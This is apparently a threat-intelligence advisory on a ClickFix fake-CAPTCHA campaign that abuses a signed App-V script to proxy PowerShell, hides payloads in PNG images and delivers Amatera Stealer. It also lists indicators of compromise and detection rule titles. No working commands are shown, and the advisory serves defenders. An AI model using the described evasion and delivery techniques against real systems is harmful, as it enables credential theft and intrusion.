Industry researchers identified a sophisticated fake CAPTCHA campaign that leverages a signed Microsoft Application Virtualization (App-V) script, SyncAppvPublishingServer.vbs, as a LOLBIN to proxy execution through legitimate Windows components. The attack begins with ClickFix - a social engineering prompt instructing users to manually paste and execute a command via the Run dialog, framed as a human verification check. Instead of launching PowerShell directly, the command abuses the signed Microsoft script to avoid common detection paths and naturally filters out lower-value systems since App-V components are only present on Enterprise and Education editions of Windows.
The campaign employs multiple execution gates and validation mechanisms throughout its progression, including checking clipboard contents and environment variables to ensure proper execution order and user interaction. The attack chain pulls live configuration from a public Google Calendar file, allowing attackers to update delivery parameters without redeploying earlier stages. Later stages use PNG-based steganography to deliver encrypted payloads hidden inside images, which are extracted and executed entirely in memory. The chain ultimately delivers Amatera Stealer, a well-known information stealing malware that uses layered encryption, evasive networking techniques, and modular tasking capabilities. The malware establishes command and control communication using Host header spoofing and bypasses standard Windows networking libraries through direct syscalls to avoid EDR detection.
IOCs (21)
Scan your environment for IOCs →DOMAIN 6
cdn.jsdelivr.netsec-t2.fainerkern.rusvc-int-api-identity-token-issuer-v2-mn.in.netgcdnb.pbrd.coiili.ios6.imgcdn.devIP ADDRESS 1
212.34.138.4SHA256 FILE HASH 8
b61fe68f0b1bef12eed8a34769120d77579af9d3c529ac48dfe82a08eefa001b64d723ead9b43a049f9c8e23c8d4ec09ffabeac2d9b079c863c89a4aab7c9a459c35e9f637365706c00acaa050a4510adfcb47e7052b870c6d07f6d4464ac2d23df78f628494b9d8d560ee2841fc3b5da6eecf9397f693f4416dab9e573ce38fbbfc4b48676aa78b5f18b50e733837a94df744da329fe5b1b7ba6920d9e02dc35339d1169e2187a482fcbc86ea94e9799bb9dbaf264622595ee6e94b54b51778d8db6df5c28db9967206c652d5f48d46b6f863b4c4abb2f234ce8f41aea601cc18dad9cb91fb97a817e00fa0cd1cb9ab59f672b8ddab29f72708787f19bf6aa1FILE NAME 6
herf54basic.icsqhs9hr5gPqez.pngfOa2bcJ.pngYzkCM2.pngSyncAppvPublishingServer.vbsDetections
Enable detections →- Suspicious Scripted Retrieval of ICS Calendar Files
- PowerShell Execution via WScript with WinINet Load
- Execution of WScript App-V Publishing script to proxy execution to PowerShell
- Detect payloads hidden in image files via steganography — look for image downloads followed by script execution
- Monitor signed Windows binaries used to proxy execution of untrusted code (LOLBins)
- Detect reflective DLL injection or in-memory assembly loading without disk writes
- Flag suspicious PowerShell execution — encoded commands, download cradles, or AMSI bypass
- Detect encrypted C2 channels using non-standard certificates or pinned connections
- Detect malware resolving C2 addresses from public web services (pastebins, calendars, DNS TXT)
- Alert when users execute files downloaded from the internet lacking Mark-of-the-Web
- Alert on execution that checks for specific environment conditions before proceeding
- Flag network traffic using protocol impersonation to disguise C2 communications